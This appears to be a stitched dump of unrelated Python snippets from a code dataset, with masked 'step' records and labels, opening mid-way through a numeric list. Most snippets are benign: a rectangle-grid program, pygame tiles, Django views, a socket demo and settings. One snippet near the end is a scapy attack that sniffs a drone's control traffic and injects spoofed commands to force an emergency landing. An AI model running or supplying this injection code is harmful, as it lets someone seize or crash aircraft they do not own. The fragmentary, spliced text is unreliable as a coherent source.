2084,-834736952,-123162323,389682556,656996523,864481760,381156936,129520066,-995551618,106129054,-471580461,856850511,653020333,531769579,-190375506,-992983956,73867968,-931909584,403329114,-945055546,627782991,-666011011,214665550,505169020,210703185,-591690068,11218620,790987020,561646751,-33552011,-407054835,-850936697,-838201457,-878394038,-759131062,-857347819,531582062,941614352,-743754869,650338718,178603580,-834368178,-976933957,138667533,746471721,551579035,-173400777,-1191455,320121832,-756997945,402594806,934711944,970489131,-193223639,276816990,842959026,-799673669,-367385466,681433973,468892554,-455199860,393993101,905435993,218314965,284795080,913357885,-652530417,743455659,869345718,808902357,829820413,7206928,544900359,225903242,-507688526,750219353,-663810717,-643969173,-269151675,348252329,-144351998,693995296,-692546103,869432378,650161259,568234384,710782517,179157604,-446849233,-922615096,-61183498,30945194,819052356,467911324,119876349,46908453,-420671619,344944591,889080726,-619477633,174882730,553799129,-941691933,146036558,-116064711,222282163,-272996845,-147041859,-381977096,-786757040,229096334,712541239,326039628,-952490563,-362214129,-680530864,421358212,-472290821,-331398150,-42297937,-393141325,-467541333,655524006,452908624,-626562356,-758303565,338224482,312047704,599445442,-3
28430584,259549134,838272865,-755896597,-151000710,607787908,11870257,-680877184,528161590,769242561,-447486537,-127579653,135915595,-271181270,12536315,693445551,900639800,-692327759,-671179999,977783490,935798407,659688020,-478438023,-852131846,-900332354,-71029072,888095095,924175448,430392829,391195112,399460998,-173259008,-168543477,-495967896,-697314804,591126097,301126906,946273416,-772817341,-996445410,466876435,-92937212,-226599286,43831927,-588596503,-55759661,212885530,-805455693,572269060,415773175,-320900489,-651775079,5276363,91615150,-882588415,502210147,-401039810,26713405,-723806893,125439289,472777644,869504248,967552969,-268043646,-146710780,-511973692,-803204681,-146827180,-453201623,-878534466,631307563,507752930,-63646026,-348120807,222898965,-410732708,617953050,-478244422,877782569,-507956686,-196516478,-477074335,329039585,-480651334,-890030740,461391919,-977815738,-943937849,321402466,-588396975,-945139052,871313567,-484830305,365305963,891985414,466048577,880607400,-245705654,359506342,-612177301,840415132,693541406,707348310,971762025,-871678269,897143169,625100531,743908163,-315815019,-63211252,-962051459,510469141,566817231,-186207711,309838979,101194721,-127111899,-109107404,-702499174,918781433,34041307,927374088,-67369303,-680339659,202481166,-218771120,329951816,-280782626,-423403505,619779171,-567310903,-660420942,756801677,996208091,822990010,940351540,1331227,382201579,891956260,-894584436,346600029,805733487,-691767750,859030444,1]\n print(Solution().minimumOperations(nums, 938, 80))", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
from bisect import bisect_left as bisect
while True:
    xp, yp = set(), set()
    veneer = []
    W, H = map(int, input().split())
    if not W:
        break
    N = int(input())
    for i in range(N):
        x1, y1, x2, y2 = map(int, input().split())
        veneer.append((x1, y1, x2, y2))
        xp.add(x1)
        xp.add(x2)
        yp.add(y1)
        yp.add(y2)
    # bisect only works on sorted sequences, so sort the compressed coordinates
    xp = sorted(xp)
    yp = sorted(yp)
    wa = [[0 for x in range(len(xp) + 1)] for y in range(len(yp) + 1)]
    print()
    for v in veneer:
        xi1 = bisect(xp, v[0])
        xi2 = bisect(xp, v[1])
        yi1 = bisect(yp, v[2])
        yi2 = bisect(yp, v[3])
        print(xi1, yi1, xi2, yi2)
        wa[yi1][xi1] += 1
        wa[yi2 + 1][xi1] -= 1
        wa[yi1][xi2 + 1] -= 1
    mem = [[0 for x in xp] for y in yp]
    for y, _ in enumerate(yp):
        for x, _ in enumerate(xp):
            mem[y][x] += wa[y][x]
            if y > 0:
                mem[y][x] += mem[y - 1][x]
            if x > 0:
                mem[y][x] += mem[y][x - 1]
        print(wa[y])
normal
{ "blob_id": "e0fbb5ad6d822230865e34c1216b355f700e5cec", "index": 7822, "step-1": "<mask token>\n", "step-2": "<mask token>\nwhile True:\n xp, yp = set(), set()\n veneer = []\n W, H = map(int, input().split())\n if not W:\n break\n N = int(input())\n for i in range(N):\n x1, y1, x2, y2 = map(int, input().split())\n veneer.append((x1, y1, x2, y2))\n xp.add(x1)\n xp.add(x2)\n yp.add(y1)\n yp.add(y2)\n xp = list(xp)\n yp = list(yp)\n wa = [[(0) for x in range(len(xp) + 1)] for y in range(len(yp) + 1)]\n print()\n for v in veneer:\n xi1 = bisect(xp, v[0])\n xi2 = bisect(xp, v[1])\n yi1 = bisect(yp, v[2])\n yi2 = bisect(yp, v[3])\n print(xi1, yi1, xi2, yi2)\n wa[yi1][xi1] += 1\n wa[yi2 + 1][xi1] -= 1\n wa[yi1][xi2 + 1] -= 1\n mem = [[(0) for x in xp] for y in yp]\n for y, _ in enumerate(yp):\n for x, _ in enumerate(xp):\n mem[y][x] += wa[y][x]\n if y > 0:\n mem[y][x] += mem[y - 1][x]\n if x > 0:\n mem[y][x] += mem[y][x - 1]\n print(wa[y])\n", "step-3": "from bisect import bisect_left as bisect\nwhile True:\n xp, yp = set(), set()\n veneer = []\n W, H = map(int, input().split())\n if not W:\n break\n N = int(input())\n for i in range(N):\n x1, y1, x2, y2 = map(int, input().split())\n veneer.append((x1, y1, x2, y2))\n xp.add(x1)\n xp.add(x2)\n yp.add(y1)\n yp.add(y2)\n xp = list(xp)\n yp = list(yp)\n wa = [[(0) for x in range(len(xp) + 1)] for y in range(len(yp) + 1)]\n print()\n for v in veneer:\n xi1 = bisect(xp, v[0])\n xi2 = bisect(xp, v[1])\n yi1 = bisect(yp, v[2])\n yi2 = bisect(yp, v[3])\n print(xi1, yi1, xi2, yi2)\n wa[yi1][xi1] += 1\n wa[yi2 + 1][xi1] -= 1\n wa[yi1][xi2 + 1] -= 1\n mem = [[(0) for x in xp] for y in yp]\n for y, _ in enumerate(yp):\n for x, _ in enumerate(xp):\n mem[y][x] += wa[y][x]\n if y > 0:\n mem[y][x] += mem[y - 1][x]\n if x > 0:\n mem[y][x] += mem[y][x - 1]\n print(wa[y])\n", "step-4": "from bisect import bisect_left as bisect\nwhile True:\n xp, yp = set(), set()\n veneer = []\n W, H = map(int, input().split())\n if not W:\n break\n N = int(input())\n for i in range(N):\n x1, y1, x2, y2 = map(int, input().split())\n veneer.append((x1, y1, x2, y2))\n xp.add(x1)\n xp.add(x2)\n yp.add(y1)\n yp.add(y2)\n xp = list(xp)\n yp = list(yp)\n wa = [[0 for x in range(len(xp) + 1)] for y in range(len(yp) + 1)]\n print()\n for v in veneer:\n xi1 = bisect(xp, v[0])\n xi2 = bisect(xp, v[1])\n yi1 = bisect(yp, v[2])\n yi2 = bisect(yp, v[3])\n print(xi1, yi1, xi2, yi2)\n wa[yi1][xi1] += 1\n wa[yi2 + 1][xi1] -=1\n wa[yi1][xi2 + 1] -=1\n mem = [[0 for x in xp] for y in yp]\n for y, _ in enumerate(yp):\n for x, _ in enumerate(xp):\n mem[y][x] += wa[y][x]\n if y > 0:\n mem[y][x] += mem[y - 1][x]\n if x > 0:\n mem[y][x] += mem[y][x - 1]\n print(wa[y])\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import pygame
import utils
from random import randint


class TileSurface():
    tileGroup = pygame.sprite.Group()
    tileGrid = []

    def __init__(self, x, y, width, height):
        self.x = x
        self.y = y
        self.width = width
        self.height = height
        self.surface = pygame.Surface((width, height))

    def updatePos(self, x, y):
        self.x = x
        self.y = y

    def generateTiles(self):
        tiles = []
        x = 0
        y = 368
        for i in range(0, 150):
            row = []
            for j in range(0, 150):
                newTile = Dirt(x, y, self)
                newTile.rect.x = x
                newTile.rect.y = y
                row.append(newTile)
                x += 16
            x = 0
            y += 16
            tiles.append(row)
        self.tileGrid = tiles

    def drawTiles(self):
        for i in range(0, len(self.tileGrid)):
            for j in range(0, len(self.tileGrid[i])):
                self.tileGrid[i][j].update()


class Tile(pygame.sprite.Sprite):
    x = 0
    y = 0

    def __init__(self, sprite, x, y, surface):
        # Call pygame sprite init method
        super().__init__()
        self.image = pygame.image.load(sprite).convert_alpha()  # load a sprite image
        self.rect = self.image.get_rect()  # set collision rectangle
        self.x = x
        self.y = y
        self.parentSurface = surface
        self.parentSurface.tileGroup.add(self)

    def update(self):
        self.parentSurface.surface.blit(self.image, (self.x, self.y))


class Dirt(Tile):
    def __init__(self, x, y, surface):
        spriteVariant = randint(1, 3)
        super().__init__("./assets/dirt0" + str(spriteVariant) + ".png", x, y, surface)


class Air(Tile):
    def __init__(self, x, y, surface):
        super().__init__("./assets/air.png", x, y, surface)
normal
{ "blob_id": "0c8eb90c1d8a58f54186a30ce98a67310955a367", "index": 3024, "step-1": "<mask token>\n\n\nclass Tile(pygame.sprite.Sprite):\n <mask token>\n <mask token>\n\n def __init__(self, sprite, x, y, surface):\n super().__init__()\n self.image = pygame.image.load(sprite).convert_alpha()\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.parentSurface = surface\n self.parentSurface.tileGroup.add(self)\n\n def update(self):\n self.parentSurface.surface.blit(self.image, (self.x, self.y))\n\n\nclass Dirt(Tile):\n\n def __init__(self, x, y, surface):\n spriteVariant = randint(1, 3)\n super().__init__('./assets/dirt0' + str(spriteVariant) + '.png', x,\n y, surface)\n\n\nclass Air(Tile):\n\n def __init__(self, x, y, surface):\n super().__init__('./assets/air.png', x, y, surface)\n", "step-2": "<mask token>\n\n\nclass TileSurface:\n <mask token>\n <mask token>\n\n def __init__(self, x, y, width, height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.surface = pygame.Surface((width, height))\n\n def updatePos(self, x, y):\n self.x = self.x\n self.y = self.y\n\n def generateTiles(self):\n tiles = []\n x = 0\n y = 368\n for i in range(0, 150):\n row = []\n for j in range(0, 150):\n newTile = Dirt(x, y, self)\n newTile.rect.x = x\n newTile.rect.y = y\n row.append(newTile)\n x += 16\n x = 0\n y += 16\n tiles.append(row)\n self.tileGrid = tiles\n\n def drawTiles(self):\n for i in range(0, len(self.tileGrid)):\n for j in range(0, len(self.tileGrid[i])):\n self.tileGrid[i][j].update()\n\n\nclass Tile(pygame.sprite.Sprite):\n x = 0\n y = 0\n\n def __init__(self, sprite, x, y, surface):\n super().__init__()\n self.image = pygame.image.load(sprite).convert_alpha()\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.parentSurface = surface\n self.parentSurface.tileGroup.add(self)\n\n def update(self):\n self.parentSurface.surface.blit(self.image, (self.x, self.y))\n\n\nclass Dirt(Tile):\n\n def __init__(self, x, y, surface):\n spriteVariant = randint(1, 3)\n super().__init__('./assets/dirt0' + str(spriteVariant) + '.png', x,\n y, surface)\n\n\nclass Air(Tile):\n\n def __init__(self, x, y, surface):\n super().__init__('./assets/air.png', x, y, surface)\n", "step-3": "<mask token>\n\n\nclass TileSurface:\n tileGroup = pygame.sprite.Group()\n tileGrid = []\n\n def __init__(self, x, y, width, height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.surface = pygame.Surface((width, height))\n\n def updatePos(self, x, y):\n self.x = self.x\n self.y = self.y\n\n def generateTiles(self):\n tiles = []\n x = 0\n y = 368\n for i in range(0, 150):\n row = []\n for j in range(0, 150):\n newTile = Dirt(x, y, self)\n newTile.rect.x = x\n newTile.rect.y = y\n row.append(newTile)\n x += 16\n x = 0\n y += 16\n tiles.append(row)\n self.tileGrid = tiles\n\n def drawTiles(self):\n for i in range(0, len(self.tileGrid)):\n for j in range(0, len(self.tileGrid[i])):\n self.tileGrid[i][j].update()\n\n\nclass Tile(pygame.sprite.Sprite):\n x = 0\n y = 0\n\n def __init__(self, sprite, x, y, surface):\n super().__init__()\n self.image = pygame.image.load(sprite).convert_alpha()\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.parentSurface = surface\n self.parentSurface.tileGroup.add(self)\n\n def update(self):\n self.parentSurface.surface.blit(self.image, (self.x, self.y))\n\n\nclass Dirt(Tile):\n\n def __init__(self, x, y, surface):\n spriteVariant = randint(1, 3)\n super().__init__('./assets/dirt0' + str(spriteVariant) + 
'.png', x,\n y, surface)\n\n\nclass Air(Tile):\n\n def __init__(self, x, y, surface):\n super().__init__('./assets/air.png', x, y, surface)\n", "step-4": "import pygame\nimport utils\nfrom random import randint\n\n\nclass TileSurface:\n tileGroup = pygame.sprite.Group()\n tileGrid = []\n\n def __init__(self, x, y, width, height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.surface = pygame.Surface((width, height))\n\n def updatePos(self, x, y):\n self.x = self.x\n self.y = self.y\n\n def generateTiles(self):\n tiles = []\n x = 0\n y = 368\n for i in range(0, 150):\n row = []\n for j in range(0, 150):\n newTile = Dirt(x, y, self)\n newTile.rect.x = x\n newTile.rect.y = y\n row.append(newTile)\n x += 16\n x = 0\n y += 16\n tiles.append(row)\n self.tileGrid = tiles\n\n def drawTiles(self):\n for i in range(0, len(self.tileGrid)):\n for j in range(0, len(self.tileGrid[i])):\n self.tileGrid[i][j].update()\n\n\nclass Tile(pygame.sprite.Sprite):\n x = 0\n y = 0\n\n def __init__(self, sprite, x, y, surface):\n super().__init__()\n self.image = pygame.image.load(sprite).convert_alpha()\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.parentSurface = surface\n self.parentSurface.tileGroup.add(self)\n\n def update(self):\n self.parentSurface.surface.blit(self.image, (self.x, self.y))\n\n\nclass Dirt(Tile):\n\n def __init__(self, x, y, surface):\n spriteVariant = randint(1, 3)\n super().__init__('./assets/dirt0' + str(spriteVariant) + '.png', x,\n y, surface)\n\n\nclass Air(Tile):\n\n def __init__(self, x, y, surface):\n super().__init__('./assets/air.png', x, y, surface)\n", "step-5": "import pygame\nimport utils\nfrom random import randint\n\nclass TileSurface():\n\n\ttileGroup = pygame.sprite.Group()\n\n\ttileGrid = []\n\n\tdef __init__(self, x, y, width, height):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.width = width\n\t\tself.height = height\n\t\tself.surface = pygame.Surface((width, height))\n\n\tdef updatePos(self, x, y):\n\t\tself.x = self.x\n\t\tself.y = self.y\n\n\tdef generateTiles(self):\n\t\ttiles = []\n\t\tx = 0\n\t\ty = 368\n\n\t\tfor i in range(0, 150):\n\t\t\trow = []\n\t\t\tfor j in range(0, 150):\n\t\t\t\tnewTile = Dirt(x, y, self)\n\t\t\t\tnewTile.rect.x = x\n\t\t\t\tnewTile.rect.y = y\n\t\t\t\trow.append(newTile)\n\t\t\t\tx += 16\n\t\t\tx = 0\n\t\t\ty += 16\n\t\t\ttiles.append(row)\n\n\t\tself.tileGrid = tiles\n\n\tdef drawTiles(self):\n\t\tfor i in range(0, len(self.tileGrid)):\n\t\t\tfor j in range(0, len(self.tileGrid[i])):\n\t\t\t\tself.tileGrid[i][j].update()\n\n\n\n\nclass Tile(pygame.sprite.Sprite):\n\tx = 0\n\ty = 0\n\n\tdef __init__(self, sprite, x, y, surface):\n\t\t# Call pygame sprite init method\n\t\tsuper().__init__()\n\t\tself.image = pygame.image.load(sprite).convert_alpha() #load a sprite image\n\t\tself.rect = self.image.get_rect() # set collision rectangle\t\t\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.parentSurface = surface\n\n\t\tself.parentSurface.tileGroup.add(self)\n\n\tdef update(self):\n\t\tself.parentSurface.surface.blit(self.image, (self.x, self.y))\t\t\t\n\n\n\nclass Dirt(Tile):\n\tdef __init__(self, x, y, surface):\n\t\tspriteVariant = randint(1, 3)\n\t\tsuper().__init__(\"./assets/dirt0\" + str(spriteVariant) + \".png\", x, y, surface)\n\nclass Air(Tile):\n\tdef __init__(self, x, y, surface):\n\t\tsuper().__init__(\"./assets/air.png\", x, y, surface)", "step-ids": [ 7, 13, 14, 15, 16 ] }
[ 7, 13, 14, 15, 16 ]
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from .form import UserForm, ProfileForm, PostForm
from django.contrib import messages
from .models import Profile, Projects
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect


# Create your views here.
def home(request):
    return render(request, 'home.html')


@login_required(login_url='/accounts/login/')
def profile(request):
    if request.method == 'POST':
        userform = UserForm(request.POST, instance=request.user)
        profileform = ProfileForm(request.POST, request.FILES, instance=request.user.profile)
        if userform.is_valid() and profileform.is_valid():
            userform.save()
            profileform.save()
            messages.success(request, 'Profile updated successfully')
            return redirect('profile')

    userform = UserForm()
    profileform = ProfileForm()
    curr_profile = Profile.objects.get(username=request.user)
    curr_projects = Projects.user_projects(request.user)
    params = {
        'curr_user': curr_profile,
        'curr_project': curr_projects,
        'userform': userform,
        'profileform': profileform,
    }
    return render(request, 'profile/index.html', params)


@login_required(login_url='/accounts/login/')
def postpoject(request):
    if request.method == 'POST':
        postform = PostForm(request.POST, request.FILES)
        if postform.is_valid():
            pro = postform.save(commit=False)
            pro.projectowner = request.user
            pro.save()
            return redirect('profile')

    postform = PostForm()
    params = {'postform': postform}
    return render(request, 'profile/postproject.html', params)


@login_required(login_url='/accounts/login/')
def userprofile(request, id):
    try:
        userdetail = Profile.objects.get(id=id)
        curr_projects = Projects.user_projects(userdetail.username)
        if request.user.username == str(userdetail.username):
            return redirect('profile')
        else:
            return render(request, 'userprofile.html', {'userdetail': userdetail, 'curr_projects': curr_projects})
    except Profile.DoesNotExist:
        return HttpResponseRedirect(', Sorry the Page You Looking For Doesnt Exist.')


@login_required(login_url='/accounts/login/')
def projectdetails(request, id):
    specproject = Projects.objects.get(id=id)
    return render(request, 'profile/projectdetails.html', {'specproject': specproject})


def search(request):
    if 'search' in request.GET and request.GET['search']:
        search_term = request.GET.get('search')
        searchresults = Projects.searchProjects(search_term)
        return render(request, 'search.html', {'searchresults': searchresults, 'search_term': search_term})
    else:
        return redirect('home')
normal
{ "blob_id": "67de51e2a176907fd89793bd3ec52f898130e104", "index": 3713, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\n@login_required(login_url='/accounts/login/')\ndef postpoject(request):\n if request.method == 'POST':\n postform = PostForm(request.POST, request.FILES)\n if postform.is_valid:\n pro = postform.save(commit=False)\n pro.projectowner = request.user\n pro.save()\n return redirect('profile')\n postform = PostForm()\n params = {'postform': postform}\n return render(request, 'profile/postproject.html', params)\n\n\n@login_required(login_url='/accounts/login/')\ndef userprofile(request, id):\n try:\n userdetail = Profile.objects.get(id=id)\n curr_projects = Projects.user_projects(userdetail.username)\n if request.user.username == str(userdetail.username):\n return redirect('profile')\n else:\n return render(request, 'userprofile.html', {'userdetail':\n userdetail, 'curr_projects': curr_projects})\n except Profile.DoesNotExist:\n return HttpResponseRedirect(\n ', Sorry the Page You Looking For Doesnt Exist.')\n\n\n@login_required(login_url='/accounts/login/')\ndef projectdetails(request, id):\n specproject = Projects.objects.get(id=id)\n return render(request, 'profile/projectdetails.html', {'specproject':\n specproject})\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef home(request):\n return render(request, 'home.html')\n\n\n<mask token>\n\n\n@login_required(login_url='/accounts/login/')\ndef postpoject(request):\n if request.method == 'POST':\n postform = PostForm(request.POST, request.FILES)\n if postform.is_valid:\n pro = postform.save(commit=False)\n pro.projectowner = request.user\n pro.save()\n return redirect('profile')\n postform = PostForm()\n params = {'postform': postform}\n return render(request, 'profile/postproject.html', params)\n\n\n@login_required(login_url='/accounts/login/')\ndef userprofile(request, id):\n try:\n userdetail = Profile.objects.get(id=id)\n curr_projects = Projects.user_projects(userdetail.username)\n if request.user.username == str(userdetail.username):\n return redirect('profile')\n else:\n return render(request, 'userprofile.html', {'userdetail':\n userdetail, 'curr_projects': curr_projects})\n except Profile.DoesNotExist:\n return HttpResponseRedirect(\n ', Sorry the Page You Looking For Doesnt Exist.')\n\n\n@login_required(login_url='/accounts/login/')\ndef projectdetails(request, id):\n specproject = Projects.objects.get(id=id)\n return render(request, 'profile/projectdetails.html', {'specproject':\n specproject})\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\ndef home(request):\n return render(request, 'home.html')\n\n\n@login_required(login_url='/accounts/login/')\ndef profile(request):\n if request.method == 'POST':\n userform = UserForm(request.POST, instance=request.user)\n profileform = ProfileForm(request.POST, request.FILES, instance=\n request.user.profile)\n if userform.is_valid and profileform.is_valid():\n userform.save()\n profileform.save()\n messages.success(request, 'Profile updated successfully')\n return redirect('profile')\n userform = UserForm()\n profileform = ProfileForm()\n curr_profile = Profile.objects.get(username=request.user)\n curr_projects = Projects.user_projects(request.user)\n params = {'curr_user': curr_profile, 'curr_project': curr_projects,\n 'userform': userform, 'profileform': profileform}\n return render(request, 'profile/index.html', params)\n\n\n@login_required(login_url='/accounts/login/')\ndef postpoject(request):\n if request.method == 'POST':\n postform = 
PostForm(request.POST, request.FILES)\n if postform.is_valid:\n pro = postform.save(commit=False)\n pro.projectowner = request.user\n pro.save()\n return redirect('profile')\n postform = PostForm()\n params = {'postform': postform}\n return render(request, 'profile/postproject.html', params)\n\n\n@login_required(login_url='/accounts/login/')\ndef userprofile(request, id):\n try:\n userdetail = Profile.objects.get(id=id)\n curr_projects = Projects.user_projects(userdetail.username)\n if request.user.username == str(userdetail.username):\n return redirect('profile')\n else:\n return render(request, 'userprofile.html', {'userdetail':\n userdetail, 'curr_projects': curr_projects})\n except Profile.DoesNotExist:\n return HttpResponseRedirect(\n ', Sorry the Page You Looking For Doesnt Exist.')\n\n\n@login_required(login_url='/accounts/login/')\ndef projectdetails(request, id):\n specproject = Projects.objects.get(id=id)\n return render(request, 'profile/projectdetails.html', {'specproject':\n specproject})\n\n\n<mask token>\n", "step-5": "from django.shortcuts import render,redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .form import UserForm, ProfileForm, PostForm\nfrom django.contrib import messages\nfrom .models import Profile, Projects\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect\n\n\n# Create your views here.\ndef home(request):\n return render(request, 'home.html')\n\n@login_required(login_url='/accounts/login/')\ndef profile(request):\n if request.method == 'POST':\n userform = UserForm(request.POST, instance=request.user)\n profileform = ProfileForm(request.POST, request.FILES, instance=request.user.profile)\n if userform.is_valid and profileform.is_valid():\n userform.save()\n profileform.save()\n messages.success(request, 'Profile updated successfully')\n return redirect('profile')\n\n userform = UserForm()\n profileform = ProfileForm()\n curr_profile = Profile.objects.get(username = request.user)\n curr_projects = Projects.user_projects(request.user)\n params = {'curr_user': curr_profile, \n 'curr_project': curr_projects,\n 'userform':userform,\n 'profileform':profileform,\n }\n return render(request, 'profile/index.html', params)\n\n@login_required(login_url='/accounts/login/')\ndef postpoject(request):\n if request.method == 'POST':\n postform = PostForm(request.POST, request.FILES)\n if postform.is_valid:\n pro = postform.save(commit=False)\n pro.projectowner = request.user\n pro.save()\n return redirect('profile')\n\n postform = PostForm()\n params = {'postform':postform,}\n return render(request, 'profile/postproject.html', params)\n\n@login_required(login_url='/accounts/login/')\ndef userprofile(request, id):\n try:\n userdetail = Profile.objects.get(id=id)\n curr_projects = Projects.user_projects(userdetail.username)\n if request.user.username == str(userdetail.username):\n return redirect('profile')\n else:\n return render(request, 'userprofile.html', {'userdetail':userdetail, 'curr_projects':curr_projects})\n except Profile.DoesNotExist:\n return HttpResponseRedirect(', Sorry the Page You Looking For Doesnt Exist.')\n\n@login_required(login_url='/accounts/login/')\ndef projectdetails(request, id):\n specproject = Projects.objects.get(id=id)\n return render(request, 'profile/projectdetails.html', {'specproject':specproject})\n\n\ndef search(request):\n if 'search' in request.GET and request.GET['search']:\n search_term = request.GET.get('search')\n searchresults = Projects.searchProjects(search_term)\n 
return render(request, 'search.html', {'searchresults':searchresults, 'search_term':search_term})\n else:\n return redirect('home')\n ", "step-ids": [ 0, 3, 4, 5, 8 ] }
[ 0, 3, 4, 5, 8 ]
""" Simple python script to help learn basic socket API """ import sys, socket HOSTNAME = sys.argv[-2] PORT = sys.argv[-1] options = ( HOSTNAME, int(PORT) ) print options print 'creating socket...' sock = socket.socket() print 'socket created' print 'connecting...' sock.connect(options) print 'connected' print 'sending message...' sock.send('hello') print 'sent message' print 'closing...' sock.close() print 'closed'
normal
{ "blob_id": "e41b5ee0dff30cca51593e737420889bce8f419f", "index": 8563, "step-1": "\"\"\"\nSimple python script to help learn basic socket API\n\"\"\"\n\nimport sys, socket\n\nHOSTNAME = sys.argv[-2]\nPORT = sys.argv[-1]\n\noptions = ( HOSTNAME, int(PORT) )\nprint options\n\nprint 'creating socket...'\nsock = socket.socket()\nprint 'socket created'\n\nprint 'connecting...'\nsock.connect(options)\nprint 'connected'\n\nprint 'sending message...'\nsock.send('hello')\nprint 'sent message'\n\nprint 'closing...'\nsock.close()\nprint 'closed'", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from django import template register = template.Library() @register.filter(name='phone_number') def phone_number(number): # Convert a 10 character string into (xxx) xxx-xxxx. first = number[0:3] second = number[3:6] third = number[6:10] return '(' + first + ')' + ' ' + second + '-' + third
normal
{ "blob_id": "5e79a8a8fe79aac900fc0c2ff1caaa73ea08ada2", "index": 5697, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\[email protected](name='phone_number')\ndef phone_number(number):\n first = number[0:3]\n second = number[3:6]\n third = number[6:10]\n return '(' + first + ')' + ' ' + second + '-' + third\n", "step-3": "<mask token>\nregister = template.Library()\n\n\[email protected](name='phone_number')\ndef phone_number(number):\n first = number[0:3]\n second = number[3:6]\n third = number[6:10]\n return '(' + first + ')' + ' ' + second + '-' + third\n", "step-4": "from django import template\nregister = template.Library()\n\n\[email protected](name='phone_number')\ndef phone_number(number):\n first = number[0:3]\n second = number[3:6]\n third = number[6:10]\n return '(' + first + ')' + ' ' + second + '-' + third\n", "step-5": "from django import template\n\nregister = template.Library()\n\n\[email protected](name='phone_number')\ndef phone_number(number): # Convert a 10 character string into (xxx) xxx-xxxx.\n\tfirst = number[0:3]\n\tsecond = number[3:6]\n\tthird = number[6:10]\n\treturn '(' + first + ')' + ' ' + second + '-' + third\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#!/usr/bin/env python3
import threading

from scapy.all import Raw, sendp, sniff

import dup  # local helper module providing dupRadio/dupDot11/... packet-copy functions

# AT*REF payload used by emergencyland() to force the drone into its emergency state
EMER = '290717952'


class interceptThread(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
        self.curPkt = None
        self.seq = 0
        self.foundUAV = False

    def run(self):
        sniff(prn=self.interceptPkt, filter='udp port 5556')

    def interceptPkt(self, pkt):
        if self.foundUAV == False:
            print('[*] UAV Found.')
            self.foundUAV = True
        self.curPkt = pkt
        raw = pkt.sprintf('%Raw.load%')
        try:
            self.seq = int(raw.split(',')[0].split('=')[-1]) + 5
        except:
            self.seq = 0

    def injectCmd(self, cmd):
        # rebuild the captured frame layer by layer, then append the spoofed command
        radio = dup.dupRadio(self.curPkt)
        dot11 = dup.dupDot11(self.curPkt)
        snap = dup.dupSNAP(self.curPkt)
        llc = dup.dupLLC(self.curPkt)
        ip = dup.dupIP(self.curPkt)
        udp = dup.dupUDP(self.curPkt)
        raw = Raw(load=cmd)
        injectPkt = radio / dot11 / llc / snap / ip / udp / raw
        sendp(injectPkt)

    def emergencyland(self):
        spoofSeq = self.seq + 100
        watch = 'AT*COMWDG=%i\r' % spoofSeq
        toCmd = 'AT*REF=%i,%s\r' % (spoofSeq + 1, EMER)
        self.injectCmd(watch)
        self.injectCmd(toCmd)
normal
{ "blob_id": "d9908d1ff155390dcd456dd15f92db03f093089e", "index": 8146, "step-1": "#!/usr/bin/env python3\n\nclass interceptThread(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.curPkt = None\n self.seq = 0\n self.foundUAV = False\n def run(self):\n sniff(prn=self.interceptPkt, filter='udp port 5556')\n def interceptPkt(self, pkt):\n if self.foundUAV == False:\n print('[*] UAV Found.')\n self.foundUAV = True\n self.curPkt = pkt\n raw = pkt.sprintf('%Raw.load%')\n try:\n self.seq = int(raw.split(',')[0].split('=')[-1]) + 5\n except:\n self.seq = 0\n def injectCmd(self, cmd):\n radio = dup.dupRadio(self.curPkt)\n dot11 = dup.dupDot11(self.curPkt)\n snap = dup.dupSNAP(self.curPkt)\n llc = dup.dupLLC(self.curPkt)\n ip = dup.dupIP(self.curPkt)\n udp = dup.dupUDP(self.curPkt)\n raw = Raw(load=cmd)\n injectPkt = radio / dot11 / llc / snap / ip / udp / raw\n sendp(injectPkt)\nEMER = '290717952'\n def emergencyland(self):\n spoofSeq = self.seq + 100\n watch = 'AT*COMWDG=%i\\r'%spoofSeq\n toCmd = 'AT*REF=%i,%s\\r'% (spoofSeq + 1, EMER)\n self.injectCmd(watch)\n self.injectCmd(toCmd)\n\n\n\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from __future__ import annotations from .base import * # noqa SECRET_KEY = "django-insecure-usp0sg081f=9+_j95j@-k^sfp+9c*!qrwh-m17%=_9^xot#9fn" DATABASES = { "default": { "ENGINE": "django.db.backends.postgresql", "NAME": "puka-test", "USER": "jeff", "PASSWORD": "", "HOST": "127.0.0.1", "PORT": "5432", }, }
normal
